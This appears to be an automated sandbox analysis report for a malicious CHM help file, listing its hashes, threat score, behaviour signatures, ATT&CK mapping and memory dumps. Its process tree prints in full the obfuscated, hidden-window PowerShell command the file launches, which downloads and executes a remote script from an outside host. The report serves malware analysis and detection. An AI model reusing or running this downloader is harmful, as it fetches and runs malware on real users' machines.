Overview

overview

10

Static

static

mel9.chm

windows7-x64

10

mel9.chm

windows10-2004-x64

10

Analysis

  • max time kernel
    50s
  • max time network
    76s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    08-12-2022 11:15

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    mel9.chm

  • Size

    13KB

  • MD5

    e7a3bc55f52eebb6ce7df0a0047fec40

  • SHA1

    b152e0d6abc8dab4500aaa4161dac968e54cad20

  • SHA256

    908d78eb614a8ecf652163a4ccbdf62deec33d03747d4342d4f90e5bcf7995d8

  • SHA512

    3537fee98df7a02510e65c4a7fbe302e154d37e5ea497fe2677936f3442afc565a4a6307a870971ca3f45a8d25bee50b71a04c515664737cbe72d4031a186a81

  • SSDEEP

    192:8FYhJztroZ7rRXcAU9aoSpW9KZYtsufMCKv6:gYjtroZ7rAv9yYtsuFKv

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://cricot2.kylos.pl/mel9.txt

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 21 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\hh.exe
    "C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\mel9.chm
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1912
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden $t0='DE5'.replace('D','I').replace('5','x');sal P $t0;$ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|P;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|P;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing',[Microsoft.VisualBasic.CallType]::Method,'https' + '://cricot2.kylos.pl/mel9.txt')|P
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1372

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1372-55-0x0000000000000000-mapping.dmp
    Download
  • memory/1372-57-0x000007FEF1BD0000-0x000007FEF25F3000-memory.dmp
    Filesize

    10.1MB

    Download
  • memory/1372-58-0x000007FEEDD90000-0x000007FEEE8ED000-memory.dmp
    Filesize

    11.4MB

    Download
  • memory/1372-59-0x0000000002734000-0x0000000002737000-memory.dmp
    Filesize

    12KB

    Download
  • memory/1372-60-0x000000000273B000-0x000000000275A000-memory.dmp
    Filesize

    124KB

    Download
  • memory/1372-61-0x0000000002734000-0x0000000002737000-memory.dmp
    Filesize

    12KB

    Download
  • memory/1372-62-0x000000000273B000-0x000000000275A000-memory.dmp
    Filesize

    124KB

    Download
  • memory/1912-54-0x000007FEFB831000-0x000007FEFB833000-memory.dmp
    Filesize

    8KB

    Download